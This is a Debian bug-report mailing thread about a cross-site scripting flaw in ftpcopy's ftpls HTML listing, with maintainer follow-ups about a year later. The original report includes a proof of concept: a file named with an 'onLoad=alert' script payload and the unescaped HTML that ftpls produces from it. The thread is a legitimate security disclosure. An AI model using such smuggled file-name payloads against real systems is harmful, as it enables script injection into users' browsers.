Bug#607494: ftpcopy: ftpls cross-site scripting when generating HTML listing
On Fri, Dec 16, 2011 at 11:58:31AM +, Gerrit Pape wrote: On Tue, Dec 13, 2011 at 06:01:52PM +0100, Moritz Muehlenhoff wrote: On Sun, Dec 19, 2010 at 03:10:46AM +0100, non customers wrote: Subject: ftpcopy: ftpls cross-site scripting when generating HTML listing The ftpls command has a cross-site scripting (XSS) security bug when generating HTML listings: Gerrit, what's the status? This bug hasn't seen any action since a year. Hi Moritz, I completely forgot this report, sorry. I'll try to take a look within the next days, due to christmas maybe next weeks. Hi, I contacted upstream but didn't get a response. I'm about to remove the html-output feature from ftpls with an upcoming upload, and think about removing the package from Debian because of dead upstream eventually. Regards, Gerrit. -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#607494: ftpcopy: ftpls cross-site scripting when generating HTML listing
On Tue, Dec 13, 2011 at 06:01:52PM +0100, Moritz Muehlenhoff wrote: On Sun, Dec 19, 2010 at 03:10:46AM +0100, non customers wrote: Subject: ftpcopy: ftpls cross-site scripting when generating HTML listing Package: ftpcopy Version: 0.6.7-2 Severity: important Tags: security The ftpls command has a cross-site scripting (XSS) security bug when generating HTML listings: Gerrit, what's the status? This bug hasn't seen any action since a year. Hi Moritz, I completely forgot this report, sorry. I'll try to take a look within the next days, due to christmas maybe next weeks. Regards, Gerrit. -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#607494: ftpcopy: ftpls cross-site scripting when generating HTML listing
On Sun, Dec 19, 2010 at 03:10:46AM +0100, non customers wrote: Subject: ftpcopy: ftpls cross-site scripting when generating HTML listing Package: ftpcopy Version: 0.6.7-2 Severity: important Tags: security The ftpls command has a cross-site scripting (XSS) security bug when generating HTML listings: Gerrit, what's the status? This bug hasn't seen any action since a year. Cheers, Moritz -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#607494: ftpcopy: ftpls cross-site scripting when generating HTML listing
Subject: ftpcopy: ftpls cross-site scripting when generating HTML listing
Package: ftpcopy
Version: 0.6.7-2
Severity: important
Tags: security
The ftpls command has a cross-site scripting (XSS) security bug when
generating HTML listings:
$ ls -al /srv/ftp
total 12
drwxr-xr-x 2 root ftp 4096 Dec 19 02:40 .
drwxr-xr-x 3 root root 4096 Dec 19 02:34 ..
-rw-r--r-- 1 root root0 Dec 19 02:39 body onLoad=alert('non-customers
crew');
-rw-r--r-- 1 root root 39 Dec 19 02:40 number2
$ ftpls -h ftp://localhost/
htmlhead
/headbody
dl
dta href=ftp://localhost/;body onLoad=alert('non-customers
crew');body onLoad=alert('non-customers crew');/abr
dd last modified 2010-12-19 02:39:00,0B
dta href=ftp://localhost/number2;number2/abr
dd last modified 2010-12-19 02:40:00, 39B
/dl/body/html
$
-- System Information:
Debian Release: squeeze/sid
APT prefers testing
APT policy: (500, 'testing')
Architecture: i386 (i686)
Kernel: Linux 2.6.32-5-686 (SMP w/1 CPU core)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Versions of packages ftpcopy depends on:
ii libc6 2.11.2-7 Embedded GNU C Library: Shared lib
ftpcopy recommends no packages.
ftpcopy suggests no packages.
-- no debconf information
--
non-customers crew | http://rock-madrid.com/
--
___
Surf the Web in a faster, safer and easier way:
Download Opera 9 at http://www.opera.com
--
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
